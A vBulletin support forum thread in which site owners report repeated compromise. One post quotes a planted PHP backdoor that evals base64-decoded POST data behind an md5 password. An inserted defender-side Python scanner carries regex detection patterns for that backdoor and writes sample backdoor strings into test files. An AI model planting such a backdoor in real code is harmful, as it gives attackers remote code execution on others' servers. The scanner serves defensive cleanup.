Help. Both forum and admin panel just show white page

  • #31
    Can you or your host determine how the files are being altered?


    • #32
      Well, it was perfectly fine for 2 days after cleaning up everything and I even left the plugin system "Disabled" through config file. Now the site is blank white pages again and banner.php was uploaded again (already had this and the other files deleted) with the code:

      if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
      eval (base64_decode($_POST["php"]));

      And now a lot of the pages have the base64 again. So we can knock off Custom Modifications / Plugins off this list.

      Their host is not cooperating and saying they don't support third party scripts.
      I'm looking at "Last Modified" date and it seems to not change to the newest date they did it, even with these code modifications.
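
Added example (not part of any post in this thread, and not vBulletin code): a defender-side Python scan for what post #32 describes, the eval-of-POST backdoor shape and injected base64, plus a check that does not depend on "Last Modified". The pattern names, the 60-second threshold and the sample files are assumptions constructed for illustration; the ctime check assumes a Linux host.

```python
import os
import re
import tempfile

PATTERNS = {
    # eval() of a decoder fed straight from request data (banner.php shape, post #32)
    "eval-of-request-input": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(\s*"
        rb"\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    # long base64 literal handed to base64_decode, as injected into existing pages
    "long-base64-literal": re.compile(
        rb"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{200,}['\"]", re.I),
}


def scan_tree(root, ctime_gap=60):
    """Return {relative_path: [reasons]} for suspicious PHP files under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            reasons = [tag for tag, rx in PATTERNS.items() if rx.search(data)]
            st = os.stat(path)
            # Linux sets ctime itself on every change; touch cannot backdate it.
            if st.st_ctime - st.st_mtime > ctime_gap:
                reasons.append("ctime-newer-than-mtime")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings


def demo():
    """Scan a constructed sample tree (not files from the server in the thread)."""
    samples = {
        "banner.php": b'<?php if(@md5($_POST["gif"]) === "HASH") { eval (base64_decode($_POST["php"])); }',
        "header.php": b"<?php eval(base64_decode('" + b"QUJD" * 60 + b"'));",
        "index.php": b"<?php echo 'clean';",
        "faq.php": b"<?php echo 'backdated';",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        os.utime(os.path.join(root, "faq.php"), (946684800, 946684800))  # mtime reset to 2000-01-01
        return scan_tree(root)
```

Point `scan_tree` at the web root; each hit is a lead for manual review, since legitimate code can match these patterns too.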


      • #33
        I just had to deal with this too, in fact... still am. I sure hope vBulletin is looking real hard at this issue. Once they got in via our forum, I found additional php files in the root of my public_html folder. An uploader php file, pawn3d php file and a database php file. Also, a Story php file in the forums root.

        vBulletin, are you looking into this??


        • #34
          At this time there is still no known exploit causing this issue; it seems to be people affected by the old "install" folder hack that were never cleaned up properly. That is to say backdoors were left in plugins and/or in directories on the server and were left dormant until recently. If we determine there is any unknown exploit we will take action quickly.


          • #35
            I have been hacked with this same exploit 8 times over the last 2 months. I am on 4.2.2. I have 5 different websites on the same host. The only site that is being hacked is the one running vBulletin. In my mind it is safe to assume VB has been very insecure since the install folder exploit and hasn't become any better. I have no new admin account, I have not installed any plugins recently. I have to change all my passwords and clean my site weekly.

            There is no way I can continue paying for this software and upgrade to 5. I have lost all faith in VB. It was a good run boys but time to move on to something more secure.


            • #36
              You changed all your passwords? FTP, CPanel, vBulletin? You placed .htaccess on your admincp directory? Are you running vBSEO? If so, I suggest removing it immediately.

              If you continue to get attacked, there is a backdoor on your server somewhere. Most likely placed during the initial attack. Did you go through all the steps in the "Securing your site" thread? As stated in that thread, skipping one can leave you vulnerable to future attacks.

              Wayne Luke


              • #37
                I have changed all those passwords. I have not moved my htaccess file. I am not running vBSEO.

                That thread was the first thing I went through. I have been running the queries and running greps for the infected files. Clearly there is some type of backdoor. Problem is finding and removing it. Unfortunately I was away for a couple months so any backups of a clean site are long gone for me and I fear the issue is in my database which I absolutely cannot afford to lose.

                TheLastSuperman has some other things I can try in his thread. Hopefully something will work so I can at least get to the point of migrating my database to something stable. I find it hard to believe there has been no acknowledgement from VB on this issue. It has to be kicking sales in the nuts having a new major hack for the software every couple months.


                • #38
                  I am just reinstalling my forum for about the 8th time and will be calling support shortly.

                  Same problem keeps occurring and I have followed the instructions to the letter each time.


                  • #39
                    dupe post

